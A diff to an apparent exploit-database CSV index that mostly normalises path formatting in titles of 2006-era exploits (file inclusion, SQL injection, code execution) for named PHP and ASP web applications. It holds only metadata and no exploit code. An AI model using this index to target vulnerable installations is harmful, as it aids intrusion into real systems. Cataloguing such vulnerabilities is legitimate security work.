1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution",2006-04-10,RusH,php,webapps,0 @@ -16926,7 +16927,7 @@ id,file,description,date,author,platform,type,port 1707,platforms/php/webapps/1707.pl,"My Gaming Ladder Combo System 7.0 - Remote Code Execution",2006-04-22,nukedx,php,webapps,0 1710,platforms/php/webapps/1710.txt,"Clansys 1.1 - 'index.php' PHP Code Insertion",2006-04-23,nukedx,php,webapps,0 1711,platforms/php/webapps/1711.txt,"Built2Go PHP Movie Review 2B - Remote File Inclusion",2006-04-23,"Camille Myers",php,webapps,0 -1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - 'function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0 +1713,platforms/php/webapps/1713.pl,"FlexBB 0.5.5 - '/function/showprofile.php' SQL Injection",2006-04-24,Devil-00,php,webapps,0 1714,platforms/asp/webapps/1714.txt,"BK Forum 4.0 - 'member.asp' SQL Injection",2006-04-24,n0m3rcy,asp,webapps,0 1720,platforms/php/webapps/1720.pl,"Invision Power Board 2.1.5 - (lastdate) Remote Code Execution",2006-04-26,RusH,php,webapps,0 1722,platforms/php/webapps/1722.txt,"TopList 1.3.8 - 'phpBB Hack' Remote File Inclusion (1)",2006-04-27,[Oo],php,webapps,0 @@ -17401,7 +17402,7 @@ id,file,description,date,author,platform,type,port 2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - 'Review.asp' SQL Injection",2006-09-17,ajann,asp,webapps,0 -2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - 'users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 +2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - '/users_logins/admin.txt' Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 2389,platforms/php/webapps/2389.pl,"Alstrasoft e-Friends 4.85 - Remote Command Execution",2006-09-18,Kw3[R]Ln,php,webapps,0 2390,platforms/php/webapps/2390.txt,"PNPHPBB2 < 1.2g - 'phpbb_root_path' Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution",2006-09-19,rgod,php,webapps,0 @@ -17436,8 +17437,8 @@ id,file,description,date,author,platform,type,port 2428,platforms/php/webapps/2428.txt,"PBLang 4.66z - (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - 'phpbb_root_path' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - 'admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 -2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - 'admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - '/admin/index.php' Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - 'fs_form_links.php' File Inclusion",2006-09-25,SHiKaA,php,webapps,0 2435,platforms/php/webapps/2435.txt,"Web//News 1.4 - 'parser.php' Remote File Inclusion (1)",2006-09-26,ThE-WoLf-KsA,php,webapps,0 2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - 'menu.php' Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 @@ -17462,7 +17463,7 @@ id,file,description,date,author,platform,type,port 2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - 'yesno.phtml' Remote File Inclusion",2006-09-30,Drago84,php,webapps,0 2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion",2006-09-30,"Mehmet Ince",php,webapps,0 2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Inclusion",2006-10-01,Kacper,php,webapps,0 -2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - 'includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 +2468,platforms/php/webapps/2468.txt,"BBaCE 3.5 - '/includes/functions.php' Remote File Inclusion",2006-10-02,SpiderZ,php,webapps,0 2469,platforms/php/webapps/2469.pl,"JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 2470,platforms/php/webapps/2470.txt,"phpMyProfiler 0.9.6 - Remote File Inclusion",2006-10-03,mozi,php,webapps,0 2471,platforms/php/webapps/2471.pl,"Travelsized CMS 0.4 - 'FrontPage.php' Remote File Inclusion",2006-10-03,Kacper,php,webapps,0 @@ -17485,14 +17486,14 @@ id,file,description,date,author,platform,type,port 2489,platforms/php/webapps/2489.pl,"Ciamos CMS 0.9.6b - 'config.php' Remote File Inclusion",2006-10-08,Kacper,php,webapps,0 2490,platforms/php/webapps/2490.txt,"Freenews 1.1 - 'moteur.php' Remote File Inclusion",2006-10-08,"Mehmet Ince",php,webapps,0 2491,platforms/php/webapps/2491.pl,"PHPPC 1.03 RC1 - '/lib/functions.inc.php' Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 -2493,platforms/php/webapps/2493.pl,"docmint 2.0 - 'engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps,0 +2493,platforms/php/webapps/2493.pl,"docmint 2.0 - '/engine/require.php' Remote File Inclusion",2006-10-09,K-159,php,webapps,0 2494,platforms/php/webapps/2494.txt,"OpenDock Easy Doc 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 2495,platforms/php/webapps/2495.txt,"OpenDock Easy Blog 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 2496,platforms/php/webapps/2496.txt,"WebYep 1.1.9 - 'webyep_sIncludePath' File Inclusion",2006-10-09,the_day,php,webapps,0 2497,platforms/php/webapps/2497.txt,"OpenDock Easy Gallery 1.4 - 'doc_directory' File Inclusion",2006-10-09,the_day,php,webapps,0 2498,platforms/php/webapps/2498.php,"Flatnuke 2.5.8 - 'file()' Privilege Escalation / Code Execution",2006-10-10,rgod,php,webapps,0 2499,platforms/php/webapps/2499.php,"Flatnuke 2.5.8 - 'userlang' Local Inclusion / Delete All Users Exploit",2006-10-10,rgod,php,webapps,0 -2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - 'templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 +2500,platforms/php/webapps/2500.pl,"phpMyAgenda 3.1 - '/templates/header.php3' Local File Inclusion",2006-10-10,"Nima Salehi",php,webapps,0 2501,platforms/php/webapps/2501.txt,"TribunaLibre 3.12 Beta - 'ftag.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2502,platforms/php/webapps/2502.txt,"registroTL - 'main.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 2503,platforms/php/webapps/2503.txt,"compteur 2.0 - 'param_editor.php' Remote File Inclusion",2006-10-10,DarkFig,php,webapps,0 @@ -17543,8 +17544,8 @@ id,file,description,date,author,platform,type,port 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0 -2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - 'extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 -2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - 'forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 +2558,platforms/php/webapps/2558.txt,"Jinzora 2.6 - '/extras/mt.php' Remote File Inclusion",2006-10-14,ddoshomo,php,webapps,0 +2559,platforms/php/webapps/2559.txt,"CyberBrau 0.9.4 - '/forum/track.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2560,platforms/php/webapps/2560.txt,"CampSite 2.6.1 - (g_documentRoot) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2561,platforms/php/webapps/2561.txt,"NuralStorm Webmail 0.98b - 'process.php' Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 2562,platforms/php/webapps/2562.txt,"AROUNDMe 0.5.2 - (templatePath) Remote File Inclusion",2006-10-15,Kw3[R]Ln,php,webapps,0 @@ -17569,27 +17570,27 @@ id,file,description,date,author,platform,type,port 2588,platforms/php/webapps/2588.txt,"Easynews 4.4.1 - 'admin.php' Authentication Bypass",2006-10-17,nuffsaid,php,webapps,0 2589,platforms/php/webapps/2589.txt,"Brim 1.2.1 - 'renderer' Multiple Remote File Inclusions",2006-10-17,mdx,php,webapps,0 2590,platforms/php/webapps/2590.txt,"PHPPowerCards 2.10 - 'txt.inc.php' Remote Code Execution",2006-10-18,nuffsaid,php,webapps,0 -2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - 'plugins/main.php' Remote File Inclusion",2006-10-18,MP,php,webapps,0 +2591,platforms/php/webapps/2591.txt,"PHP AMX 0.90 - '/plugins/main.php' Remote File Inclusion",2006-10-18,MP,php,webapps,0 2592,platforms/asp/webapps/2592.htm,"Active Bulletin Board 1.1b2 - Remote User Pass Change Exploit",2006-10-18,ajann,asp,webapps,0 2593,platforms/php/webapps/2593.php,"PHP-Post 1.01 - 'template' Remote Code Execution",2006-10-18,Kacper,php,webapps,0 2594,platforms/php/webapps/2594.php,"YapBB 1.2 Beta2 - 'yapbb_session.php' Remote File Inclusion",2006-10-18,Kacper,php,webapps,0 2595,platforms/php/webapps/2595.txt,"LoCal Calendar 1.1 - 'lcUser.php' Remote File Inclusion",2006-10-18,o0xxdark0o,php,webapps,0 2596,platforms/php/webapps/2596.pl,"EPNadmin 0.7 - 'constantes.inc.php' Remote File Inclusion",2006-10-19,Kw3[R]Ln,php,webapps,0 2598,platforms/php/webapps/2598.php,"PH Pexplorer 0.24 - 'explorer_load_lang.php' Local File Inclusion",2006-10-19,Kacper,php,webapps,0 -2599,platforms/php/webapps/2599.txt,"pandaBB - (displayCategory) Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 -2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - (themesdir) Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 +2599,platforms/php/webapps/2599.txt,"pandaBB - 'displayCategory' Remote File Inclusion",2006-10-19,nukedclx,php,webapps,0 +2600,platforms/php/webapps/2600.txt,"Segue CMS 1.5.8 - 'themesdir' Remote File Inclusion",2006-10-19,nuffsaid,php,webapps,0 2602,platforms/php/webapps/2602.txt,"Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion",2006-10-19,x_w0x,php,webapps,0 2603,platforms/php/webapps/2603.txt,"Lou Portail 1.4.1 - 'admin_module.php' Remote File Inclusion",2006-10-20,MP,php,webapps,0 2604,platforms/php/webapps/2604.txt,"WGCC 0.5.6b - 'quiz.php' SQL Injection",2006-10-20,ajann,php,webapps,0 2605,platforms/php/webapps/2605.txt,"RSSonate - 'xml2rss.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 -2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - 'lib/rs.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 +2606,platforms/php/webapps/2606.txt,"CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion",2006-10-21,Kw3[R]Ln,php,webapps,0 2607,platforms/php/webapps/2607.txt,"kawf 1.0 - 'main.php' Remote File Inclusion",2006-10-21,o0xxdark0o,php,webapps,0 2608,platforms/php/webapps/2608.txt,"Virtual Law Office - 'phpc_root_path' Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2609,platforms/php/webapps/2609.txt,"Open Meetings Filing Application - Remote File Inclusion",2006-10-21,"Mehmet Ince",php,webapps,0 2611,platforms/php/webapps/2611.txt,"Trawler Web CMS 1.8.1 - Multiple Remote File Inclusions",2006-10-21,k1tk4t,php,webapps,0 -2612,platforms/php/webapps/2612.txt,"PGOSD - 'misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 +2612,platforms/php/webapps/2612.txt,"PGOSD - '/misc/function.php3' Remote File Inclusion",2006-10-22,"Mehmet Ince",php,webapps,0 2613,platforms/php/webapps/2613.txt,"Mambo Module MambWeather 1.8.1 - Remote File Inclusion",2006-10-22,h4ntu,php,webapps,0 -2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - 'DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 +2614,platforms/php/webapps/2614.txt,"Net_DNS 0.3 - '/DNS/RR.php' Remote File Inclusion",2006-10-22,Drago84,php,webapps,0 2615,platforms/php/webapps/2615.txt,"SpeedBerg 1.2beta1 - 'SPEEDBERG_PATH' File Inclusion",2006-10-22,k1tk4t,php,webapps,0 2616,platforms/php/webapps/2616.php,"JaxUltraBB 2.0 - 'delete.php' Remote Auto Deface Exploit",2006-10-22,Kacper,php,webapps,0 2617,platforms/php/webapps/2617.php,"PHP-Nuke 7.9 - (Encyclopedia) SQL Injection",2006-10-22,Paisterist,php,webapps,0 @@ -17599,18 +17600,18 @@ id,file,description,date,author,platform,type,port 2623,platforms/php/webapps/2623.pl,"SourceForge 1.0.4 - 'database.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2624,platforms/php/webapps/2624.txt,"WiClear 0.10 - (path) Remote File Inclusion",2006-10-23,"the master",php,webapps,0 2626,platforms/php/webapps/2626.txt,"MDweb 1.3 - (chemin_appli) Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 -2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - 'include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 -2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - 'includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 +2627,platforms/php/webapps/2627.txt,"Jaws 0.5.2 - '/include/JawsDB.php' Remote File Inclusion",2006-10-23,Drago84,php,webapps,0 +2628,platforms/php/webapps/2628.pl,"JumbaCMS 0.0.1 - '/includes/functions.php' Remote File Inclusion",2006-10-23,Kw3[R]Ln,php,webapps,0 2630,platforms/php/webapps/2630.txt,"InteliEditor 1.2.x - 'lib.editor.inc.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2631,platforms/php/webapps/2631.php,"Ascended Guestbook 1.0.0 - 'embedded.php' File Inclusion",2006-10-24,Kacper,php,webapps,0 2632,platforms/php/webapps/2632.pl,"CMS Faethon 2.0 - 'mainpath' Remote File Inclusion",2006-10-24,r0ut3r,php,webapps,0 -2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - 'login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 +2640,platforms/php/webapps/2640.txt,"UeberProject 1.0 - '/login/secure.php' Remote File Inclusion",2006-10-24,"Mehmet Ince",php,webapps,0 2642,platforms/asp/webapps/2642.asp,"Berty Forum 1.4 - 'index.php' Blind SQL Injection",2006-10-24,ajann,asp,webapps,0 2643,platforms/php/webapps/2643.php,"JaxUltraBB 2.0 - Command Execution",2006-10-24,BlackHawk,php,webapps,0 2644,platforms/php/webapps/2644.php,"Discuz! 5.0.0 GBK - SQL Injection / Admin Credentials Disclosure",2006-10-25,rgod,php,webapps,0 2645,platforms/php/webapps/2645.txt,"ArticleBeach Script 2.0 - 'index.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 2646,platforms/php/webapps/2646.txt,"TextPattern 1.19 - 'publish.php' Remote File Inclusion",2006-10-25,Bithedz,php,webapps,0 -2647,platforms/php/webapps/2647.php,"Imageview 5 - 'Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,php,webapps,0 +2647,platforms/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,php,webapps,0 2648,platforms/php/webapps/2648.txt,"CommentIT - (PathToComment) Remote File Inclusion",2006-10-25,"Cold Zero",php,webapps,0 2652,platforms/php/webapps/2652.htm,"PHP League 0.81 - 'config.php' Remote File Inclusion",2006-10-25,ajann,php,webapps,0 2653,platforms/php/webapps/2653.txt,"MPCS 1.0 - (path) Remote File Inclusion",2006-10-26,v1per-haCker,php,webapps,0 @@ -17625,7 +17626,7 @@ id,file,description,date,author,platform,type,port 2663,platforms/php/webapps/2663.txt,"PhpShop Core 0.9.0 RC1 - 'PS_BASE' File Inclusion",2006-10-28,"Cold Zero",php,webapps,0 2664,platforms/php/webapps/2664.pl,"PHPMyDesk 1.0 Beta - 'viewticket.php' Local File Inclusion",2006-10-28,Kw3[R]Ln,php,webapps,0 2665,platforms/php/webapps/2665.txt,"FreePBX 2.1.3 - 'upgrade.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 -2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - 'Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 +2666,platforms/php/webapps/2666.txt,"mp3SDS 3.0 - '/Core/core.inc.php' Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2667,platforms/php/webapps/2667.txt,"Electronic Engineering Tool (EE TOOL) 0.4.1 - Remote File Inclusion",2006-10-28,"Mehmet Ince",php,webapps,0 2668,platforms/php/webapps/2668.htm,"MiraksGalerie 2.62 - 'pcltar.lib.php' Remote File Inclusion",2006-10-28,ajann,php,webapps,0 2669,platforms/php/webapps/2669.php,"Free Image Hosting 1.0 - 'forgot_pass.php' File Inclusion",2006-10-28,Kacper,php,webapps,0 @@ -17644,14 +17645,14 @@ id,file,description,date,author,platform,type,port 2687,platforms/php/webapps/2687.htm,"E Annu 1.0 - Login Bypass (SQL Injection)",2006-10-30,ajann,php,webapps,0 2688,platforms/php/webapps/2688.txt,"phpProfiles 2.1 Beta - Multiple Remote File Inclusions",2006-10-30,v1per-haCker,php,webapps,0 2691,platforms/php/webapps/2691.txt,"P-Book 1.17 - (pb_lang) Remote File Inclusion",2006-10-31,Matdhule,php,webapps,0 -2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - 'gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 -2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - 'themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 +2692,platforms/php/webapps/2692.txt,"GEPI 1.4.0 - '/gestion/savebackup.php' Remote File Inclusion",2006-10-31,"Sumit Siddharth",php,webapps,0 +2693,platforms/php/webapps/2693.txt,"PwsPHP 1.1 - '/themes/fin.php' Remote File Inclusion",2006-10-31,3l3ctric-Cracker,php,webapps,0 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - (Debug) Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0 2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps,0 -2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - 'admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 +2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0 -2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - 'classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps,0 +2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - '/classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps,0 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0 2704,platforms/php/webapps/2704.txt,"FreeWebShop.org script 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0 2706,platforms/php/webapps/2706.txt,"MODx CMS 0.9.2.1 - 'FCKeditor' Remote File Inclusion",2006-11-03,nuffsaid,php,webapps,0 @@ -17673,20 +17674,20 @@ id,file,description,date,author,platform,type,port 2726,platforms/php/webapps/2726.txt,"Agora 1.4 RC1 - 'MysqlfinderAdmin.php' Remote File Inclusion",2006-11-06,the_day,php,webapps,0 2727,platforms/php/webapps/2727.txt,"OpenEMR 2.8.1 - 'srcdir' Multiple Remote File Inclusions",2006-11-06,the_day,php,webapps,0 2728,platforms/php/webapps/2728.txt,"Article Script 1.6.3 - 'rss.php' SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 -2731,platforms/php/webapps/2731.pl,"iPrimal Forums - 'admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 +2731,platforms/php/webapps/2731.pl,"iPrimal Forums - '/admin/index.php' Change User Password Exploit",2006-11-06,Bl0od3r,php,webapps,0 2732,platforms/php/webapps/2732.txt,"PHPGiggle 12.08 - 'CFG_PHPGIGGLE_ROOT' File Inclusion",2006-11-06,ajann,php,webapps,0 2733,platforms/php/webapps/2733.txt,"iWare Pro 5.0.4 - 'chat_panel.php' Remote Code Execution",2006-11-07,nuffsaid,php,webapps,0 2736,platforms/php/webapps/2736.txt,"PHPAdventure 1.1 - 'ad_main.php' Remote File Inclusion",2006-11-07,HER0,php,webapps,0 -2739,platforms/php/webapps/2739.txt,"iPrimal Forums - 'admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 +2739,platforms/php/webapps/2739.txt,"iPrimal Forums - '/admin/index.php' Remote File Inclusion",2006-11-08,Bl0od3r,php,webapps,0 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 - (cfgProgDir) Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 -2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - 'inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 +2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 - '/inc/irayofuncs.php' Remote File Inclusion",2006-11-08,DeltahackingTEAM,php,webapps,0 2742,platforms/php/webapps/2742.txt,"DodosMail 2.0.1 - 'dodosmail.php' Remote File Inclusion",2006-11-08,"Cold Zero",php,webapps,0 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - 'session.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 2745,platforms/php/webapps/2745.txt,"gtcatalog 0.9.1 - 'index.php' Remote File Inclusion",2006-11-09,v1per-haCker,php,webapps,0 2746,platforms/asp/webapps/2746.pl,"AspPired2Poll 1.0 - 'MoreInfo.asp' SQL Injection",2006-11-09,ajann,asp,webapps,0 2747,platforms/php/webapps/2747.txt,"MyAlbum 3.02 - 'language.inc.php' Remote File Inclusion",2006-11-09,"Silahsiz Kuvvetler",php,webapps,0 2748,platforms/php/webapps/2748.pl,"PHPManta 1.0.2 - 'view-sourcecode.php' Local File Inclusion",2006-11-09,ajann,php,webapps,0 -2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - 'core/core.php' Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 +2750,platforms/php/webapps/2750.txt,"EncapsCMS 0.3.6 - '/core/core.php' Remote File Inclusion",2006-11-10,Firewall,php,webapps,0 2751,platforms/php/webapps/2751.txt,"BrewBlogger 1.3.1 - 'printLog.php' SQL Injection",2006-11-10,"Craig Heffner",php,webapps,0 2752,platforms/php/webapps/2752.txt,"WORK System E-Commerce 3.0.1 - Remote File Inclusion",2006-11-10,SlimTim10,php,webapps,0 2754,platforms/asp/webapps/2754.pl,"NuCommunity 1.0 - 'cl_CatListing.asp' SQL Injection",2006-11-11,ajann,asp,webapps,0 @@ -17704,7 +17705,7 @@ id,file,description,date,author,platform,type,port 2766,platforms/php/webapps/2766.pl,"CMSmelborp Beta - 'user_standard.php' Remote File Inclusion",2006-11-12,DeltahackingTEAM,php,webapps,0 2767,platforms/php/webapps/2767.txt,"StoryStream 4.0 - 'baseDir' Remote File Inclusion",2006-11-12,v1per-haCker,php,webapps,0 2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0 -2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - 'actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps,0 +2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - '/actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps,0 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0 2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0 2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0 @@ -17717,7 +17718,7 @@ id,file,description,date,author,platform,type,port 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0 -2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - 'manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0 +2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0 2794,platforms/php/webapps/2794.txt,"mg.applanix 1.3.1 - (apx_root_path) Remote File Inclusion",2006-11-17,v1per-haCker,php,webapps,0 2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - 'textview.php' Information Disclosure",2006-11-17,"Craig Heffner",php,webapps,0 @@ -17733,7 +17734,7 @@ id,file,description,date,author,platform,type,port 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - 'register.asp' SQL Injection",2006-11-19,ajann,asp,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - 'adminprint.php' Remote File Inclusion",2006-11-21,irvian,php,webapps,0 -2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - 'src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 +2818,platforms/php/webapps/2818.txt,"e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion",2006-11-21,DeltahackingTEAM,php,webapps,0 2819,platforms/php/webapps/2819.txt,"LDU 8.x - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2820,platforms/php/webapps/2820.txt,"Seditio 1.10 - (avatarselect id) SQL Injection",2006-11-21,nukedx,php,webapps,0 2822,platforms/php/webapps/2822.pl,"ContentNow 1.39 - 'pageid' SQL Injection",2006-11-21,Revenge,php,webapps,0 @@ -17763,7 +17764,7 @@ id,file,description,date,author,platform,type,port 2850,platforms/php/webapps/2850.txt,"Exhibit Engine 1.22 - 'styles.php' Remote File Inclusion",2006-11-25,Kacper,php,webapps,0 2851,platforms/php/webapps/2851.txt,"Hacks List phpBB Mod 1.21 - SQL Injection",2006-11-26,"the master",php,webapps,0 2852,platforms/php/webapps/2852.txt,"Mambo Component com_flyspray < 1.0.1 - Remote File Disclosure",2006-11-26,3l3ctric-Cracker,php,webapps,0 -2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - 'admin/edit.asp' SQL Injection",2006-11-26,bolivar,asp,webapps,0 +2853,platforms/asp/webapps/2853.txt,"SimpleBlog 2.3 - '/admin/edit.asp' SQL Injection",2006-11-26,bolivar,asp,webapps,0 2859,platforms/php/webapps/2859.php,"Discuz! 4.x - SQL Injection / Admin Credentials Disclosure",2006-11-28,rgod,php,webapps,0 2862,platforms/php/webapps/2862.txt,"P-News 2.0 - 'user.txt' Remote Password Disclosure",2006-11-28,Lu7k,php,webapps,0 2863,platforms/php/webapps/2863.php,"kubix 0.7 - Multiple Vulnerabilities",2006-11-29,BlackHawk,php,webapps,0 @@ -17773,7 